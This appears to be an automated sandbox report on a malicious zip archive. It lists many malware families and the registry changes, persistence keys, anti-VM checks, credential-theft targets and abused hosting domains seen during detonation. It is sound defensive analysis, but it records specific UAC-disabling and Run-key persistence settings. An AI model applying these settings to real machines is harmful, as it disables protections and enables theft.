Analysis Overview
SHA256
cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Threat Level: Known bad
The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Metasploit family
Merlin payload
AsyncRat
Meduza family
Meduza Stealer payload
UAC bypass
MetaSploit
Lumma Stealer, LummaC
Suspicious use of NtCreateUserProcessOtherParentProcess
Remcos family
Phorphiex family
Nanocore family
Xworm family
Merlin
Quasar family
Mercurialgrabber family
Stealc family
Quasar payload
Meduza
RedLine
Remcos
Phorphiex, Phorpiex
Detect Vidar Stealer
ZharkBot
Mercurial Grabber Stealer
NanoCore
Detects ZharkBot payload
Stealc
Zharkbot family
Quasar RAT
RedLine payload
Lumma family
Detect Xworm Payload
Discord RAT
Phorphiex payload
Vidar family
Xworm
Discordrat family
Vidar
Merlin family
Redline family
Asyncrat family
Looks for VirtualBox Guest Additions in registry
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Looks for VMWare Tools registry key
Sets file to hidden
Server Software Component: Terminal Services DLL
Downloads MZ/PE file
Adds policy Run key to start application
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Possible privilege escalation attempt
Drops startup file
Checks BIOS information in registry
Unsecured Credentials: Credentials In Files
Deletes itself
Modifies file permissions
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
Identifies Wine through registry keys
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Accesses Microsoft Outlook profiles
Enumerates connected drives
Checks installed software on the system
Maps connected drives based on registry
Power Settings
Indicator Removal: Clear Persistence
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
UPX packed file
Enumerates processes with tasklist
Drops file in System32 directory
Sets desktop wallpaper using registry
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Checks for VirtualBox DLLs, possible anti-VM trick
Enumerates physical storage devices
Detects Pyinstaller
Browser Information Discovery
System Location Discovery: System Language Discovery
Access Token Manipulation: Create Process with Token
Unsigned PE
System Network Configuration Discovery: Internet Connection Discovery
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Wi-Fi Discovery
Program crash
Embeds OpenSSL
Command and Scripting Interpreter: JavaScript
Suspicious behavior: LoadsDriver
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Modifies Control Panel
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Volume Shadow Copy service COM API
Suspicious use of FindShellTrayWindow
outlook_office_path
Suspicious behavior: MapViewOfSection
Modifies Internet Explorer settings
Checks processor information in registry
Modifies data under HKEY_USERS
Views/modifies file attributes
outlook_win_path
Delays execution with timeout.exe
Checks SCSI registry key(s)
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Modifies registry key
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-14 20:23
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-14 20:23
Reported
2024-12-15 01:10
Platform
win7-20240708-es
Max time kernel
972s
Max time network
1198s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Lumma Stealer, LummaC
Lumma family
Meduza
Meduza Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Meduza family
Mercurial Grabber Stealer
Mercurialgrabber family
NanoCore
Nanocore family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Remcos
Remcos family
Stealc
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1924 created 1260 | N/A | C:\Users\Admin\AppData\Local\Temp\79556\Boxing.pif | C:\Windows\Explorer.EXE |
| PID 1924 created 1260 | N/A | C:\Users\Admin\AppData\Local\Temp\79556\Boxing.pif | C:\Windows\Explorer.EXE |
| PID 1924 created 1260 | N/A | C:\Users\Admin\AppData\Local\Temp\79556\Boxing.pif | C:\Windows\Explorer.EXE |
| PID 2684 created 1260 | N/A | C:\Users\Admin\AppData\Local\Temp\835450\Mineral.com | C:\Windows\Explorer.EXE |
| PID 608 created 1260 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Vidar
Vidar family
Xworm
Xworm family
ZharkBot
Zharkbot family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\rorukal.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Local\Temp\Files\rorukal.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Launcher.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Local\Temp\Files\rorukal.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\x902135\Parameters\ServiceDll = "C:\\Windows\\System32\\x902135.dat" | C:\Windows\system32\reg.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\kyjjrfgjjsedf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\bav64.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\NET framework = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\jerniuiopu.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\PCI Manager = "C:\\Program Files (x86)\\PCI Manager\\pcimgr.exe" | C:\Users\Admin\AppData\Local\Temp\Files\nano.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\384522037.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\Files\t1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\curlapp64 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\curlapp64.exe" | C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\AppData\Local\Temp\835450\RegAsm.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\nano.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
Indicator Removal: Clear Persistence
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip4.seeip.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
